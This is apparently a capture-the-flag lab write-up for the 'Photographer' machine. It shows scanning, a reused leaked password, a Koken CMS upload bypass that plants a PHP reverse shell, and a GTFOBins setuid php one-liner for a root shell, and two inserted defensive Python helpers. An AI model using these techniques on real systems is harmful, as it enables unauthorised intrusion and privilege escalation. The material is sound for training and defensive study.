# Photographer

1. Started by running a TCP scan with Nmap

```bash
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
|   256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
|_  256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: daisa ahomi
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| smb2-time: 
|   date: 2025-10-29T14:06:00
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2025-10-29T10:06:00-04:00
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds

```

2. SMB was running on the server, hence I used smbclient to enumerate the network shares present.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FR10lEkZ4UShlNIQ1K2Dx%2Fimage.png?alt=media&#x26;token=ad1226e4-5874-4e0d-8344-2231e6dc7379" alt=""><figcaption></figcaption></figure>

3. Enumerated the `sambashare` network share and found the following files

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FITHrHzha9GjIV2pgtFnq%2Fimage.png?alt=media&#x26;token=7e2b9b81-3c11-463b-a41f-4d6c568ea2bd" alt=""><figcaption></figcaption></figure>

4. Read the contents of `mailsent.txt` and found the following

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FszjAqidcXD6RzGTm4xuL%2Fimage.png?alt=media&#x26;token=7ec13086-d57b-4252-82bb-ee9d915fb3f3" alt=""><figcaption></figcaption></figure>

5. Here I could find two email addresses and what seemed like a secret key at the end of the file.
6. Next, I enumerated the ports and, as revealed in the TCP scan, Koken CMS was running on port 80.
7. I looked online for exploits of Koken and found a file-upload vulnerability affecting the same version as was running on the target.

<https://www.exploit-db.com/exploits/48706>

8. As it was an authenticated vulnerability, I had to find the admin panel and the login credentials first. Hence I ran a directory scan using gobuster.
9. I found a `/admin` subdirectory with the following login page

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FGZglzN7s0F1t2QWxhlFi%2Fimage.png?alt=media&#x26;token=a689db64-b8e6-43d7-b2a7-5b78997e4fec" alt=""><figcaption></figcaption></figure>

10. I used the `daisy@photographer.com` email address from the `mailsent.txt` file and used `babygirl` as the password as was revealed in the same text file. Then, I was redirected to the following page.

    <figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2Fv2AoHVFDRNXSe3G0zLx0%2Fimage.png?alt=media&#x26;token=43a9481c-89e7-4772-9776-c1fae8a1b581" alt=""><figcaption></figcaption></figure>
11. After that I used the pentestmonkey PHP reverse shell and saved it as a file named `monkey.php.jpg`
12. I turned on Burp Suite.
13. I used the Import Content option on the Koken dashboard and uploaded the file. While uploading I captured the request in Burp Suite and modified the request by renaming the reverse shell file `monkey.php.jpg` to `monkey.php`.
14. I resent the request and uploaded the reverse shell.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FWa1VAneNbslujc0cLCrs%2Fimage.png?alt=media&#x26;token=99651ce1-b66e-4c1e-ace5-6c9dc7683ec2" alt=""><figcaption></figcaption></figure>
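Step 13 works because the upload filter trusts the filename the client sends and can be bypassed by renaming `monkey.php.jpg` to `monkey.php` in the intercepted request. As an added example (not Koken's code), the server-side validation below rejects both names no matter what the client claims; the image-signature table and the executable-extension list are assumptions for illustration.

```python
"""Added example (not Koken's code): server-side upload validation that would
reject both monkey.php.jpg and monkey.php. Signature and extension lists are
assumptions chosen for illustration."""
import secrets

# Magic bytes for the image types the endpoint is meant to accept.
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# Extensions Apache/mod_php may execute. None may appear ANYWHERE in the name,
# so monkey.php.jpg is refused before a later rename to monkey.php matters.
SERVER_EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps", "pht"}


def validate_upload(filename: str, head: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied name and the file's first bytes."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path component
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        # Covers extension-less names and dotfiles such as .htaccess (handler overrides).
        return False, "missing or dotfile name"
    exts = parts[1:]
    if any(e in SERVER_EXECUTABLE for e in exts):
        return False, "server-executable extension present"
    final = exts[-1]
    if final not in IMAGE_MAGIC:
        return False, f"extension .{final} not allowed"
    if not head.startswith(IMAGE_MAGIC[final]):
        return False, "content does not match declared type"
    return True, "ok"


def stored_name(validated_filename: str) -> str:
    """Never store under the client's name: random stem plus the validated extension."""
    ext = validated_filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads: a JPEG-looking header and a PHP stub.
    jpeg_head = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
    php_head = b"<?php echo 1; ?>"
    for name, head in [("monkey.php.jpg", jpeg_head), ("monkey.php", php_head),
                       ("photo.jpg", jpeg_head), ("photo.jpg", php_head),
                       (".htaccess", b"AddType")]:
        print(name, validate_upload(name, head))
```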

15. I clicked on the file and visited the link given in the Inspector tab

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FARVZpyy0yQdMvGvI4fdg%2Fimage.png?alt=media&#x26;token=294c5ed6-be39-411a-8eda-8bd470c27a6b" alt=""><figcaption></figcaption></figure>

16. Upon opening the link I was redirected to the following page

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2F02e7DwoBpWxlwvaleDi8%2Fimage.png?alt=media&#x26;token=afae057b-3dc1-48a2-9a27-58283e505db1" alt=""><figcaption></figcaption></figure>

17. I started a reverse shell on the attacker device.
18. I visited the Download File link given on the webpage to get the location of where the file was being stored and initiate the reverse shell.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FDyvc5qdYOAlZK15tz2ec%2Fimage.png?alt=media&#x26;token=cf87c18a-9ef0-4759-a9ec-e2b011a9ff96" alt=""><figcaption></figcaption></figure>

19. I found the first flag in the `/home/daisa` directory

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FeLiJzzynRquUHh7AFPfB%2Fimage.png?alt=media&#x26;token=1213ab64-0d5f-48a7-b35e-71a8121462e5" alt=""><figcaption></figcaption></figure>

20. Next, I enumerated the target for privilege escalation and found a `php7.2` binary with the sticky bit set.

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FK4riQ9q6d3VmocaMoukj%2Fimage.png?alt=media&#x26;token=d04d9b53-2e7d-4a7d-a0f4-fe40322f952c" alt=""><figcaption></figcaption></figure>

21. I went to the good old GTFOBins, looked up exploits for the php binary and found the following

```bash
CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"
```

22. I used the above commands and got a root shell

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FtyiofSLEQFVbTpTc420F%2Fimage.png?alt=media&#x26;token=1308189b-ff76-4ba3-9b7e-ed1497c92d27" alt=""><figcaption></figcaption></figure>
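The misconfiguration behind steps 20 to 22 is an interpreter carrying a privileged bit. As an added defender-side check, not from the original write-up, the helper below walks a filesystem root, reports every setuid/setgid regular file and flags those named like script interpreters (so `php7.2` is normalised to `php`); the `INTERPRETERS` list and the constructed demo tree are assumptions.

```python
"""Added audit helper (not from the original write-up): list setuid/setgid files
under a root and flag interpreter-named ones such as php7.2.
INTERPRETERS is an assumed list of names that should never carry those bits."""
import os
import re
import stat
import tempfile

INTERPRETERS = {"php", "perl", "python", "ruby", "node", "lua", "tclsh"}
# Strip version suffixes so php7.2 -> php and python3 -> python.
_VERSION_SUFFIX = re.compile(r"[\d.]+$")


def audit_suid(root: str) -> list[tuple[str, str]]:
    """Return sorted (verdict, path) pairs: 'FLAG' for privileged interpreters, 'INFO' otherwise."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks out of root
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            stem = _VERSION_SUFFIX.sub("", name.lower())
            findings.append(("FLAG" if stem in INTERPRETERS else "INFO", path))
    return sorted(findings)


def build_demo_tree() -> str:
    """Constructed sample tree: a setuid interpreter, a legitimate setuid tool, a plain file."""
    root = tempfile.mkdtemp(prefix="suid_audit_")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for name, mode in (("php7.2", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        open(path, "wb").close()
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for verdict, path in audit_suid(build_demo_tree()):
        print(verdict, path)
```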

23. I found the final root flag inside the `/root` directory

<figure><img src="https://697415701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGOxHHc65JQOToz8nkPKh%2Fuploads%2FkPr7xnUXEkLOZ46O4NZE%2Fimage.png?alt=media&#x26;token=60b61a40-dd8a-4f10-bc16-162bfa09835d" alt=""><figcaption></figcaption></figure>
